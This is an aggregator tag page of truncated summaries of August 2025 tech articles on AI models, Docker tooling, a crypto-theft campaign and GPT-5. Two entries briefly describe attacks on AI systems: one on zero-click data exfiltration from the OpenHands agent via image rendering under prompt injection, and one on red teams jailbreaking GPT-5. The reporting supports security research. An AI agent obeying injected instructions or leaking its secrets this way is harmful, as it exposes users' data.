Tag: phi

  • Slashdot: $1M Stolen in ‘Industrial-Scale Crypto Theft’ Using AI-Generated Code

    Source URL: https://yro.slashdot.org/story/25/08/11/0037258/1m-stolen-in-industrial-scale-crypto-theft-using-ai-generated-code?utm_source=rss1.0mainlinkanon&utm_medium=feed Source: Slashdot Title: $1M Stolen in ‘Industrial-Scale Crypto Theft’ Using AI-Generated Code Feedly Summary: AI Summary and Description: Yes Summary: The text discusses a sophisticated cybercrime operation, GreedyBear, which utilizes a highly coordinated strategy, weaponizing browser extensions and phishing sites to facilitate industrial-scale crypto theft. The group’s innovative techniques, including the modification…

  • Simon Willison’s Weblog: Qwen3-4B-Thinking: "This is art – pelicans don’t ride bikes!"

    Source URL: https://simonwillison.net/2025/Aug/10/qwen3-4b/#atom-everything Source: Simon Willison’s Weblog Title: Qwen3-4B-Thinking: "This is art – pelicans don’t ride bikes!" Feedly Summary: I’ve fallen a few days behind keeping up with Qwen. They released two new 4B models last week: Qwen3-4B-Instruct-2507 and its thinking equivalent Qwen3-4B-Thinking-2507. These are relatively tiny models that punch way above their weight. I’ve…

  • Docker: Remocal and Minimum Viable Models: Why Right-Sized Models Beat API Overkill

    Source URL: https://www.docker.com/blog/remocal-minimum-viable-models-ai/ Source: Docker Title: Remocal and Minimum Viable Models: Why Right-Sized Models Beat API Overkill Feedly Summary: A practical approach to escaping the expensive, slow world of API-dependent AI The $20K Monthly Reality Check You built a simple sentiment analyzer for customer reviews. It works great. Except it costs $847/month in API calls…

  • Embrace The Red: OpenHands and the Lethal Trifecta: Leaking Your Agent’s Secrets

    Source URL: https://embracethered.com/blog/posts/2025/openhands-the-lethal-trifecta-strikes-again/ Source: Embrace The Red Title: OpenHands and the Lethal Trifecta: Leaking Your Agent’s Secrets Feedly Summary: Another day, another AI data exfiltration exploit. Today we talk about OpenHands, formerly referred to as OpenDevin initially. It’s created by All-Hands AI. OpenHands renders images in chat, which enables zero-click data exfiltration during prompt injection…

  • Slashdot: Red Teams Jailbreak GPT-5 With Ease, Warn It’s ‘Nearly Unusable’ For Enterprise

    Source URL: https://it.slashdot.org/story/25/08/08/2113251/red-teams-jailbreak-gpt-5-with-ease-warn-its-nearly-unusable-for-enterprise?utm_source=rss1.0mainlinkanon&utm_medium=feed Source: Slashdot Title: Red Teams Jailbreak GPT-5 With Ease, Warn It’s ‘Nearly Unusable’ For Enterprise Feedly Summary: AI Summary and Description: Yes Summary: The text highlights significant security vulnerabilities in the newly released GPT-5 model, noting that it was easily jailbroken within a short timeframe. The results from different red teaming efforts…

  • The Register: Meet President Willian H. Brusen from the great state of Onegon

    Source URL: https://www.theregister.com/2025/08/08/gpt-5-fake-presidents-states/ Source: The Register Title: Meet President Willian H. Brusen from the great state of Onegon Feedly Summary: LLMs still struggle with accurate text within graphics hands on OpenAI’s GPT-5, unveiled on Thursday, is supposed to be the company’s flagship model, offering better reasoning and more accurate responses than previous-gen products. But when…

  • Docker: Build a Recipe AI Agent with Koog and Docker

    Source URL: https://www.docker.com/blog/build-a-recipe-ai-agent-with-koog-and-docker/ Source: Docker Title: Build a Recipe AI Agent with Koog and Docker Feedly Summary: Hi, I’m Philippe Charriere, a Principal Solutions Architect at Docker. I like to test new tools and see how they fit into real-world workflows. Recently, I set out to see if JetBrains’ Koog framework could run with Docker…

  • OpenAI : From hard refusals to safe-completions: toward output-centric safety training

    Source URL: https://openai.com/index/gpt-5-safe-completions Source: OpenAI Title: From hard refusals to safe-completions: toward output-centric safety training Feedly Summary: Discover how OpenAI’s new safe-completions approach in GPT-5 improves both safety and helpfulness in AI responses—moving beyond hard refusals to nuanced, output-centric safety training for handling dual-use prompts. AI Summary and Description: Yes Summary: The text discusses OpenAI’s…